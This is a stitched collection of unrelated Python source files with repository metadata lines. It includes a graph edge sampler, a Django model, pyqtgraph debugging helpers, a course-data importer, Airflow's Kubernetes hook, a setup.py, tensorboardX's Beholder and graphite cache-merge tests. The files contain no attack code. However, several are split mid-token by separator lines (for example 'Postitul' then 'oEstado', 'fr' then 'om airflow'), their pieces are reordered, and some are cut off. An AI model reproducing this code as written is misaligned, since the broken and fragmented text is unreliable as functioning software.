[random-pair, random-node, stratified-random-pair, stratified-random-node]"
return None
def get_num_linked_edges(self):
return len(self.__linked_edges)
def get_num_total_edges(self):
return self.__num_total_edges
def get_num_nodes(self):
return self.__N
def get_linked_edges(self):
return self.__linked_edges
def get_held_out_set(self):
return self.__held_out_map
def get_test_set(self):
return self.__test_map
def set_num_pieces(self, num_pieces):
self.__num_pieces = num_pieces
def __random_pair_sampling(self, mini_batch_size):
"""
sample list of edges from the whole training network uniformly, regardless
of links or non-links edges.The sampling approach is pretty simple: randomly generate
one edge and then check if that edge passes the conditions. The iteration
stops until we get enough (mini_batch_size) edges.
"""
p = mini_batch_size
mini_batch_set = Set() # list of samples in the mini-batch
# iterate until we get $p$ valid edges.
while p > 0:
firstIdx = random.randint(0,self.__N-1)
secondIdx = random.randint(0, self.__N-1)
if firstIdx == secondIdx:
continue
# make sure the first index is smaller than the second one, since
# we are dealing with undirected graph.
edge = (min(firstIdx, secondIdx), max(firstIdx, secondIdx))
# the edge should not be in 1)hold_out set, 2)test_set 3) mini_batch_set (avoid duplicate)
if edge in self.__held_out_map or edge in self.__test_map or edge in mini_batch_set:
continue
# great, we put it into the mini_batch list.
mini_batch_set.add(edge)
p -= 1
scale = (self.__N*(self.__N-1)/2)/mini_batch_size
return (mini_batch_set, scale)
def __random_node_sampling(self):
"""
A set consists of all the pairs that involve one of the N nodes: we first sample one of
the node from N nodes, and sample all the edges for that node. h(x) = 1/N
"""
mini_batch_set = Set()
# randomly select the node ID
nodeId = random.randint(0, self.__N-1)
for i in range(0, self.__N):
# make sure the first index is smaller than the second one, since
# we are dealing with undirected graph.
edge = (min(nodeId, i), max(nodeId, i))
if edge in self.__held_out_map or edge in self.__test_map \
or edge in mini_batch_set:
continue
mini_batch_set.add(edge)
return (mini_batch_set, self.__N)
def __stratified_random_pair_sampling(self, mini_batch_size):
"""
We divide the edges into linked and non-linked edges, and each time either sample
mini-batch from linked-edges or non-linke
|
MERegistro/meregistro
|
meregistro/apps/postitulos/models/Postitulo.py
|
Python
|
bsd-3-clause
| 2,464
| 0.007323
|
# -*- coding: utf-8 -*-
from django.db import models
from apps.postitulos.models.EstadoPostitulo import EstadoPostitulo
from apps.postitulos.models.TipoPostitulo import TipoPostitulo
from apps.postitulos.models.PostituloTipoNormativa import PostituloTipoNormativa
from apps.postitulos.models.CarreraPostitulo import CarreraPostitulo
from apps.postitulos.models.AreaPostitulo import AreaPostitulo
from apps.registro.models.Nivel import Nivel
from apps.registro.models.Jurisdiccion import Jurisdiccion
import datetime
"""
Título nomenclado nacional
"""
class Postitulo(models.Model):
nombre = models.CharField(max_length=255)
tipo_normativa = models.ForeignKey(PostituloTipoNormativa)
normativa = models.CharField(max_length=50)
carrera_postitulo = models.ForeignKey(CarreraPostitulo)
observaciones = models.CharField(max_length=255, null=True, blank=True)
niveles = models.ManyToManyField(Nivel, db_table='postitulos_postitulos_niveles')
areas = models.ManyToManyField(AreaPostitulo, db_table='postitulos_postitulos_areas')
jurisdicciones = models.ManyToManyField(Jurisdiccion, db_table='postitulos_postitulos_jurisdicciones') # Provincias
estado = models.ForeignKey(EstadoPostitulo) # Concuerda con el último estado en TituloEstado
class Meta:
app_label = 'postitulos'
ordering = ['nombre']
def __unicode__(self):
return self.nombre
"Sobreescribo el init para agregarle propiedades"
def __init__(self, *args, **kwargs):
super(Postitulo, self).__init__(*args, **kwargs)
self.estados = self.getEstados()
def registrar_estado(self):
from apps.postitulos.models.PostituloEstado import PostituloEstado
registro = PostituloEstado(estado = self.estado)
registro.fecha = datetime.date.today()
registro.postitulo_id = self.id
registro.save()
def getEstados(self):
from apps.postitulos.models.PostituloEstado import PostituloEstado
try:
estados = Postitul
|
oEstado.objects.filter(postitulo = self).order_by('fecha',
|
'id')
except:
estados = {}
return estados
"Algún título jurisdiccional está asociado al título?"
def asociado_carrera_postitulo_jurisdiccional(self):
from apps.postitulos.models.CarreraPostituloJurisdiccional import CarreraPostituloJurisdiccional
return CarreraPostituloJurisdiccional.objects.filter(postitulo = self).exists()
|
ArteliaTelemac/PostTelemac
|
PostTelemac/meshlayerlibs/pyqtgraph/debug.py
|
Python
|
gpl-3.0
| 41,232
| 0.00827
|
# -*- coding: utf-8 -*-
"""
debug.py - Functions to aid in debugging
Copyright 2010 Luke Campagnola
Distributed under MIT/X11 license. See license.txt for more information.
"""
from __future__ import print_function
import sys, traceback, time, gc, re, types, weakref, inspect, os, cProfile, threading
from . import ptime
from numpy import ndarray
from .Qt import QtCore, QtGui
from .util.mutex import Mutex
from .util import cprint
__ftraceDepth = 0
def ftrace(func):
"""Decorator used for marking the beginning and end of function calls.
Automatically indents nested calls.
"""
def w(*args, **kargs):
global __ftraceDepth
pfx = " " * __ftraceDepth
print(pfx + func.__name__ + " start")
__ftraceDepth += 1
try:
rv = func(*args, **kargs)
finally:
__ftraceDepth -= 1
print(pfx + func.__name__ + " done")
return rv
return w
class Tracer(object):
"""
Prints every function enter/exit. Useful for debugging crashes / lockups.
"""
def __init__(self):
self.count = 0
self.stack = []
def trace(self, frame, event, arg):
self.count += 1
# If it has been a long time since we saw the top of the stack,
# print a reminder
if self.count % 1000 == 0:
print("----- current stack: -----")
for line in self.stack:
print(line)
if event == 'call':
line = " " * len(self.stack) + ">> " + self.frameInfo(frame)
print(line)
self.stack.append(line)
elif event == 'return':
self.stack.pop()
line = " " * len(self.stack) + "<< " + self.frameInfo(frame)
print(line)
if len(self.stack) == 0:
self.count = 0
return self.trace
def stop(self):
sys.settrace(None)
def start(self):
sys.settrace(self.trace)
def frameInfo(self, fr):
filename = fr.f_code.co_filename
funcname = fr.f_code.co_name
lineno = fr.f_lineno
callfr = sys._getframe(3)
callline = "%s %d" % (callfr.f_code.co_name, callfr.f_lineno)
args, _, _, value_dict = inspect.getargvalues(fr)
if len(args) and args[0] == 'self':
instance = value_dict.get('self', None)
if instance is not None:
cls = getattr(instance, '__class__', None)
if cls is not None:
funcname = cls.__name__ + "." + funcname
return "%s: %s %s: %s" % (callline, filename, lineno, funcname)
def warnOnException(func):
"""Decorator that catches/ignores exceptions and prints a stack trace."""
def w(*args, **kwds):
try:
func(*args, **kwds)
except:
printExc('Ignored exception:')
return w
def getExc(indent=4, prefix='| ', skip=1):
lines = formatException(*sys.exc_info(), skip=skip)
lines2 = []
for l in lines:
lines2.extend(l.strip('\n').split('\n'))
lines3 = [" "*indent + prefix + l for l in lines2]
return '\n'.join(lines3)
def printExc(msg='', indent=4, prefix='|'):
"""Print an error message followed by an indented exception backtrace
(This function is intended to be called within except: blocks)"""
exc = getExc(indent, prefix + ' ', skip=2)
print("[%s] %s\n" % (time.strftime("%H:%M:%S"), msg))
print(" "*indent + prefix + '='*30 + '>>')
print(exc)
print(" "*indent + prefix + '='*30 + '<<')
def printTrace(msg='', indent=4, prefix='|'):
"""Print an error message followed by an indented stack trace"""
trace = backtrace(1)
#exc = getExc(indent, prefix + ' ')
print("[%s] %s\n" % (time.strftime("%H:%M:%S"), msg))
print(" "*indent + prefix + '='*30 + '>>')
for line in trace.split('\n'):
print(" "*indent + prefix + " " + line)
print(" "*indent + prefix + '='*30 + '<<')
def backtrace(skip=0):
return ''.join(traceback.format_stack()[:-(skip+1)])
def formatException(exctype, value, tb, skip=0):
"""Return a list of formatted exception strings.
Similar to traceback.format_exception, but displays the entire stack trace
rather than just the portion downstream of the point where the exception is
caught. In particular, unhandled exceptions that occur during Qt signal
handling do not usually show the portion of the stack that emitted the
signal.
"""
lines = traceback.format_exception(exctype, value, tb)
lines = [lines[0]] + traceback.format_stack()[:-(skip+1)] + [' --- exception caught here ---\n'] + lines[1:]
return lines
def printException(exctype, value, traceback):
"""Print an exception with its full traceback.
Set `sys.excepthook = printException` to ensure that exceptions caught
inside Qt signal handlers are printed with their full stack trace.
"""
print(''.join(formatException(exctype, value, traceback, skip=1)))
def listObjs(regex='Q', typ=None):
"""List all objects managed by python gc with class name matching regex.
Finds 'Q...' classes by default."""
if typ is not None:
return [x for x in gc.get_objects() if isinstance(x, typ)]
else:
return [x for x in gc.get_objects() if re.match(regex, type(x).__name__)]
def findRefPath(startObj, endObj, maxLen=8, restart=True, seen={}, path=None, ignore=None):
"""Determine all paths of object references from startObj to endObj"""
refs = []
if path is None:
path = [endObj]
if ignore is None:
ignore = {}
ignore[id(sys._getframe())] = None
ignore[id(path)] = None
ignore[id(seen)] = None
prefix = " "*(8-maxLen)
#print prefix + str(map(type, path))
prefix += " "
if restart:
#gc.collect()
seen.clear()
gc.collect()
newRefs = [r for r in gc.get_referrers(endObj) if id(r) not in ignore]
ignore[id(newRefs)] = None
#fo = allFrameObjs()
#newRefs = []
#for r in gc.get_referrers(endObj):
#try:
#if r not in fo:
#newRefs.append(r)
#except:
#newRefs.append(r)
for r in newRefs:
#print prefix+"->"+str(type(r))
if type(r).__name__ in ['frame', 'function', 'listiterator']:
#print prefix+" FRAME"
continue
try:
if any([r is x for x in path]):
#print prefix+" LOOP", objChainString([r]+path)
continue
except:
print(r)
print(path)
raise
if r is startObj:
refs.append([r])
print(refPathString([startObj]+path))
continue
if maxLen == 0:
#print prefix+" END:", objChainString([r]+path)
continue
## See if we have already searched this node.
## If not, recurse.
tree = None
try:
cache = seen[id(r)]
if cache[0] >= maxLen:
tree = cache[1]
for p in tree:
print(refPathString(p+path))
except KeyError:
pass
ignore[id(tree)] = None
if tree is None:
tree = findRefPath(startObj, r, maxLen-1, restart=False, path=[r]+path, ignore=ignore)
seen[id(r)] = [maxLen, tree]
## integrate any returned results
if len(tree) == 0:
#print prefix+" EMPT
|
Y TREE"
continue
else:
for p in tree:
refs.append(p+[r])
#seen[id(r)] = [maxLen, refs]
return refs
def objString(obj):
"""R
|
eturn a short but descriptive string for any object"""
try:
if type(obj) in [int, float]:
return str(obj)
elif isinstance(obj, dict):
if len(obj) > 5:
return "<dict {%s,...}>" % (",".join(list(obj.keys())[:5]))
else:
return "<dict {%s}>" % (",".join(list(obj.keys())))
elif isinstance(obj, str):
if len(obj) > 50:
return '"%s..."' % obj[:50
|
classrank/ClassRank
|
classrank/grouch/grouch_util.py
|
Python
|
gpl-2.0
| 3,951
| 0.000253
|
import datetime
import json
from classrank.database.wrapper import Query
"""add_to_database.py: adds courses from Grouch to the ClassRank DB."""
def add_to_database(grouch_output, db):
"""
Add courses from Grouch's output to a db.
Keyword arguments:
grouch_output -- the output of Grouch (the scraped info)
db -- the db to add to
"""
print("Beginning Grouch parse ({}).".format(datetime.datetime.now()))
all_courses = parse(grouch_output)
print("Ending Grouch parse ({}).".format(datetime.datetime.now()))
if len(all_courses) != 0:
print("Beginning database add ({}).".format(datetime.datetime.now()))
with Query(db) as q:
school_dict = {"name": "Georgia Institute of Technology",
"abbreviation": "gatech"}
if not _school_in_database(school_dict, db, q):
q.add(db.school(**school_dict))
school_id = q.query(db.school).filter_by(**school_dict).one().uid
for course, sections in all_courses:
course_dict = {"school_id": school_id,
"name": course['name'],
"description": course['fullname'],
"number": course['number'],
"subject": course['school']}
if not _course_in_database(course_dict, db, q):
q.add(db.course(**course_dict))
course_id = q.query(db.course).filter_by(**course_dict).one().uid
for section in sections:
section_dict = {"course_id": course_id,
"semester": course['semester'],
"year": course['year'],
"name": section['section_id'],
"crn": section['crn']}
q.add(db.section(**section_dict))
print("Ending database add ({}).".format(datetime.datetime.now()))
def parse(to_read):
"""Parse Grouch output (JSON) to dictionaries, with some additions.
Keyword arguments:
to_read -- the file of Grouch output (one JSON document per line)
Return a list of tuples of (course, sections_of_course).
"""
# A mapping of semester number to string name
semester_map = {'2': 'Spring',
'5': 'Summer',
'8': 'Fall'}
all_courses = []
with open(to_read, 'r') as f:
for line in f:
course = json.loads(line)
# Extract the semester and year for easier use later
semester_token = course['semester'] # of the form yyyymm
year = semester_token[0:4]
month = semester_token[5:6]
semester = semester_map[month]
course['year'] = year
course['semester'] = semester
sections = []
if 'sections' in course: # If the course has sections
sections = course['sections']
all_courses.append((course, sections))
return all_courses
def _school_in_database(school_dict, db, q):
"""Check if a school is in the database.
Keyword arguments:
school_dict -- a dictionary specifying the school to check
db -- the db to search in
q -- the Query object used to query the database
Returns True if there are instances of school in database, False otherwise
"""
return len(q.query(db.school).filter_by
|
(**school_dict).all()) != 0
def _course_in_database(course_dict, db, q):
"""Check if a course is in the database.
Keyword arguments:
course_dict --
|
a dictionary specifying the course to check
db -- the db to search in
q -- the Query object used to query the database
Returns True if there are instances of course in database, False otherwise
"""
return len(q.query(db.course).filter_by(**course_dict).all()) != 0
|
airbnb/airflow
|
airflow/providers/cncf/kubernetes/hooks/kubernetes.py
|
Python
|
apache-2.0
| 9,757
| 0.002152
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tempfile
from typing import Any, Dict, Generator, Optional, Tuple, Union
import yaml
from cached_property import cached_property
from kubernetes import client, config, watch
fr
|
om airflow.exceptions import AirflowException
from airflow.hooks.base import BaseHook
def _load_body_to_dict(body):
try:
body_dict = yaml.safe_load(body)
except yaml.YAMLError as
|
e:
raise AirflowException("Exception when loading resource definition: %s\n" % e)
return body_dict
class KubernetesHook(BaseHook):
"""
Creates Kubernetes API connection.
- use in cluster configuration by using ``extra__kubernetes__in_cluster`` in connection
- use custom config by providing path to the file using ``extra__kubernetes__kube_config_path``
- use custom configuration by providing content of kubeconfig file via
``extra__kubernetes__kube_config`` in connection
- use default config by providing no extras
This hook check for configuration option in the above order. Once an option is present it will
use this configuration.
.. seealso::
For more information about Kubernetes connection:
:doc:`/connections/kubernetes`
:param conn_id: the connection to Kubernetes cluster
:type conn_id: str
"""
conn_name_attr = 'kubernetes_conn_id'
default_conn_name = 'kubernetes_default'
conn_type = 'kubernetes'
hook_name = 'Kubernetes Cluster Connection'
@staticmethod
def get_connection_form_widgets() -> Dict[str, Any]:
"""Returns connection widgets to add to connection form"""
from flask_appbuilder.fieldwidgets import BS3TextFieldWidget
from flask_babel import lazy_gettext
from wtforms import BooleanField, StringField
return {
"extra__kubernetes__in_cluster": BooleanField(lazy_gettext('In cluster configuration')),
"extra__kubernetes__kube_config_path": StringField(
lazy_gettext('Kube config path'), widget=BS3TextFieldWidget()
),
"extra__kubernetes__kube_config": StringField(
lazy_gettext('Kube config (JSON format)'), widget=BS3TextFieldWidget()
),
"extra__kubernetes__namespace": StringField(
lazy_gettext('Namespace'), widget=BS3TextFieldWidget()
),
}
@staticmethod
def get_ui_field_behaviour() -> Dict:
"""Returns custom field behaviour"""
return {
"hidden_fields": ['host', 'schema', 'login', 'password', 'port', 'extra'],
"relabeling": {},
}
def __init__(
self, conn_id: str = default_conn_name, client_configuration: Optional[client.Configuration] = None
) -> None:
super().__init__()
self.conn_id = conn_id
self.client_configuration = client_configuration
def get_conn(self) -> Any:
"""Returns kubernetes api session for use with requests"""
connection = self.get_connection(self.conn_id)
extras = connection.extra_dejson
in_cluster = extras.get("extra__kubernetes__in_cluster")
kubeconfig_path = extras.get("extra__kubernetes__kube_config_path")
kubeconfig = extras.get("extra__kubernetes__kube_config")
num_selected_configuration = len([o for o in [in_cluster, kubeconfig, kubeconfig_path] if o])
if num_selected_configuration > 1:
raise AirflowException(
"Invalid connection configuration. Options extra__kubernetes__kube_config_path, "
"extra__kubernetes__kube_config, extra__kubernetes__in_cluster are mutually exclusive. "
"You can only use one option at a time."
)
if in_cluster:
self.log.debug("loading kube_config from: in_cluster configuration")
config.load_incluster_config()
return client.ApiClient()
if kubeconfig_path is not None:
self.log.debug("loading kube_config from: %s", kubeconfig_path)
config.load_kube_config(
config_file=kubeconfig_path, client_configuration=self.client_configuration
)
return client.ApiClient()
if kubeconfig is not None:
with tempfile.NamedTemporaryFile() as temp_config:
self.log.debug("loading kube_config from: connection kube_config")
temp_config.write(kubeconfig.encode())
temp_config.flush()
config.load_kube_config(
config_file=temp_config.name, client_configuration=self.client_configuration
)
return client.ApiClient()
self.log.debug("loading kube_config from: default file")
config.load_kube_config(client_configuration=self.client_configuration)
return client.ApiClient()
@cached_property
def api_client(self) -> Any:
"""Cached Kubernetes API client"""
return self.get_conn()
def create_custom_object(
self, group: str, version: str, plural: str, body: Union[str, dict], namespace: Optional[str] = None
):
"""
Creates custom resource definition object in Kubernetes
:param group: api group
:type group: str
:param version: api version
:type version: str
:param plural: api plural
:type plural: str
:param body: crd object definition
:type body: Union[str, dict]
:param namespace: kubernetes namespace
:type namespace: str
"""
api = client.CustomObjectsApi(self.api_client)
if namespace is None:
namespace = self.get_namespace()
if isinstance(body, str):
body = _load_body_to_dict(body)
try:
response = api.create_namespaced_custom_object(
group=group, version=version, namespace=namespace, plural=plural, body=body
)
self.log.debug("Response: %s", response)
return response
except client.rest.ApiException as e:
raise AirflowException("Exception when calling -> create_custom_object: %s\n" % e)
def get_custom_object(
self, group: str, version: str, plural: str, name: str, namespace: Optional[str] = None
):
"""
Get custom resource definition object from Kubernetes
:param group: api group
:type group: str
:param version: api version
:type version: str
:param plural: api plural
:type plural: str
:param name: crd object name
:type name: str
:param namespace: kubernetes namespace
:type namespace: str
"""
api = client.CustomObjectsApi(self.api_client)
if namespace is None:
namespace = self.get_namespace()
try:
response = api.get_namespaced_custom_object(
group=group, version=version, namespace=namespace, plural=plural, name=name
)
return response
except client.rest.ApiException as e:
raise AirflowException("Exception when calling -> get_custom_object: %s\n" % e)
def get_namespace(self) -> str:
"""Returns the namespace that defined in the connection"""
connection = self.get_connection(self.conn_id)
extras = connection.extra_dejson
namespace = extras.get("extra_
|
signaldetect/messity
|
reader/receivers/core.py
|
Python
|
mit
| 238
| 0
|
"""
Handling signals of the `core` app
"""
from django.dispatch import receiver
from core import signals
from reader import actions
@receiver(signals.app_link_ready)
def app_link_ready(sender, **kwargs):
actions.create_app_link()
| ||
artefactual-labs/agentarchives
|
setup.py
|
Python
|
agpl-3.0
| 1,074
| 0.000931
|
from setuptools import setup
setup(
name="agentarchives",
description="Clients to retrieve, add, and modify records from archival management systems",
url="https://github.com/artefactual-labs/agentarchives",
author="Artefactual Systems",
author_email="info@artefactual.com",
license="AGPL 3",
version="0.7.0",
packages=[
"agentarchives",
"agentarchives.archivesspace",
"agentarchives.archivists_toolkit",
"agentarchives.atom",
],
install_requires=["requests>=2,<3", "mysqlclient>=1.3,<2"],
python_requires=">=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,!=3.5.*",
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: GNU Affero General Public License v3",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
|
"Programming Language :: Python :
|
: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
)
|
lanpa/tensorboardX
|
tensorboardX/beholder/beholder.py
|
Python
|
mit
| 8,355
| 0.000838
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from ..proto.summary_pb2 import Summary
from ..proto.summary_pb2 import SummaryMetadata
from ..proto.tensor_pb2 import TensorProto
from ..proto.tensor_shape_pb2 import TensorShapeProto
import os
import time
import numpy as np
# import tensorflow as tf
# from tensorboard.plugins.beholder import im_util
# from . import im_util
from .file_system_tools import read_pickle,\
write_pickle, write_file
from .shared_config import PLUGIN_NAME, TAG_NAME,\
SUMMARY_FILENAME, DEFAULT_CONFIG, CONFIG_FILENAME, SUMMARY_COLLECTION_KEY_NAME, SECTION_INFO_FILENAME
from . import video_writing
# from .visualizer import Visualizer
class Beholder(object):
def __init__(self, logdir):
self.PLUGIN_LOGDIR = logdir + '/plugins/' + PLUGIN_NAME
self.is_recording = False
self.video_writer = video_writing.VideoWriter(
self.PLUGIN_LOGDIR,
outputs=[video_writing.FFmpegVideoOutput, video_writing.PNGVideoOutput])
self.last_image_shape = []
self.last_update_time = time.time()
self.config_last_modified_time = -1
self.previous_config = dict(DEFAULT_CONFIG)
if not os.path.exists(self.PLUGIN_LOGDIR + '/config.pkl'):
os.makedirs(self.PLUGIN_LOGDIR)
write_pickle(DEFAULT_CONFIG,
'{}/{}'.format(self.PLUGIN_LOGDIR, CONFIG_FILENAME))
# self.visualizer = Visualizer(self.PLUGIN_LOGDIR)
def _get_config(self):
'''Reads the config file from disk or creates a new one.'''
filename = '{}/{}'.format(self.PLUGIN_LOGDIR, CONFIG_FILENAME)
modified_time = os.path.getmtime(filename)
if modified_time != self.config_last_modified_time:
config = read_pickle(filename, default=self.previous_config)
self.previous_config = config
else:
config = self.previous_config
self.config_last_modified_time = modified_time
return config
def _write_summary(self, frame):
'''Writes the frame to disk as a tensor summary.'''
path = '{}/{}'.format(self.PLUGIN_LOGDIR, SUMMARY_FILENAME)
smd = SummaryMetadata()
tensor = TensorProto(
dtype='DT_FLOAT',
float_val=frame.reshape(-1).tolist(),
tensor_shape=TensorShapeProto(
dim=[TensorShapeProto.Dim(size=frame.shape[0]),
TensorShapeProto.Dim(size=frame.shape[1]),
TensorShapeProto.Dim(size=frame.shape[2])]
)
)
summary = Summary(value=[Summary.Value(
tag=TAG_NAME, metadata=smd, tensor=tensor)]).SerializeToString()
write_file(summary, path)
@staticmethod
def stats(tensor_and_name):
imgstats = []
for (img, name) in tensor_and_name:
immax = img.max()
immin = img.min()
imgstats.append(
{
'height': img.shape[0],
'max': str(immax),
'mean': str(img.mean()),
'min': str(immin),
'name': name,
'range': str(immax - immin),
'shape': str((img.shape[1], img.shape[2]))
})
return imgstats
def _get_final_image(self, config, trainable=None, arrays=None, frame=None):
if config['values'] == 'frames':
# print('===frames===')
final_image = frame
elif config['values'] == 'arrays':
# print('===arrays===')
final_image = np.concatenate([arr for arr, _ in arrays])
stat = self.stats(arrays)
write_pickle(
stat, '{}/{}'.format(self.PLUGIN_LOGDIR, SECTION_INFO_FILENAME))
elif config['values'] == 'trainable_variables':
# print('===trainable===')
final_image = np.concatenate([arr for arr, _ in trainable])
stat = self.stats(trainable)
write_pickle(
stat, '{}/{}'.format(self.PLUGIN_LOGDIR, SECTION_INFO_FILENAME))
if len(final_image.shape) == 2: # Map grayscale images to 3D tensors.
final_image = np.expand_dims(final_image, -1)
return final_image
def _enough_time_has_passed(self, FPS):
'''For limiting how often frames are computed.'''
if FPS == 0:
return False
else:
earliest_time = self.last_update_time + (1.0 / FPS)
return time.time() >= earliest_time
def _update_frame(self, trainable, arrays, frame, config):
final_image = self._get_final_image(config, trainable, arrays, frame)
self._write_summary(final_image)
self.last_image_shape = final_image.shape
return final_image
def _update_recording(self, frame, config):
'''Adds a frame to the current video
|
output.'''
# pylint: disable=redefined-variable-type
shoul
|
d_record = config['is_recording']
if should_record:
if not self.is_recording:
self.is_recording = True
print('Starting recording using %s',
self.video_writer.current_output().name())
self.video_writer.write_frame(frame)
elif self.is_recording:
self.is_recording = False
self.video_writer.finish()
print('Finished recording')
# TODO: blanket try and except for production? I don't someone's script to die
# after weeks of running because of a visualization.
def update(self, trainable=None, arrays=None, frame=None):
'''Creates a frame and writes it to disk.
Args:
trainable: a list of namedtuple (tensors, name).
arrays: a list of namedtuple (tensors, name).
frame: lalala
'''
new_config = self._get_config()
if True or self._enough_time_has_passed(self.previous_config['FPS']):
# self.visualizer.update(new_config)
self.last_update_time = time.time()
final_image = self._update_frame(
trainable, arrays, frame, new_config)
self._update_recording(final_image, new_config)
##############################################################################
# @staticmethod
# def gradient_helper(optimizer, loss, var_list=None):
# '''A helper to get the gradients out at each step.
# Args:
# optimizer: the optimizer op.
# loss: the op that computes your loss value.
# Returns: the gradient tensors and the train_step op.
# '''
# if var_list is None:
# var_list = tf.trainable_variables()
# grads_and_vars = optimizer.compute_gradients(loss, var_list=var_list)
# grads = [pair[0] for pair in grads_and_vars]
# return grads, optimizer.apply_gradients(grads_and_vars)
# implements pytorch backward later
class BeholderHook():
pass
# """SessionRunHook implementation that runs Beholder every step.
# Convenient when using tf.train.MonitoredSession:
# ```python
# beholder_hook = BeholderHook(LOG_DIRECTORY)
# with MonitoredSession(..., hooks=[beholder_hook]) as sess:
# sess.run(train_op)
# ```
# """
# def __init__(self, logdir):
# """Creates new Hook instance
# Args:
# logdir: Directory where Beholder should write data.
# """
# self._logdir = logdir
# self.beholder = None
#
|
gwaldo/graphite-web
|
webapp/tests/test_readers_util.py
|
Python
|
apache-2.0
| 16,540
| 0.000665
|
from .base import TestCase
import os
import shutil
import time
from django.conf import settings
import whisper
import gzip
from graphite.readers import WhisperReader, FetchInProgress, MultiReader, merge_with_cache
from graphite.wsgi import application # NOQA makes sure we have a working WSGI app
from graphite.node import LeafNode
class MergeWithCacheTests(TestCase):
maxDiff = None
def test_merge_with_cache_with_different_step_no_data(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, None))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='sum'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.appe
|
nd(None)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_sum(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# F
|
ill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='sum'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(60)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_average(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='average'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(1)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_max(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='max'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(1)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_min(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='min'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(1)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_last(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='last'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(1)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_bad(self):
# Data values from the Reader:
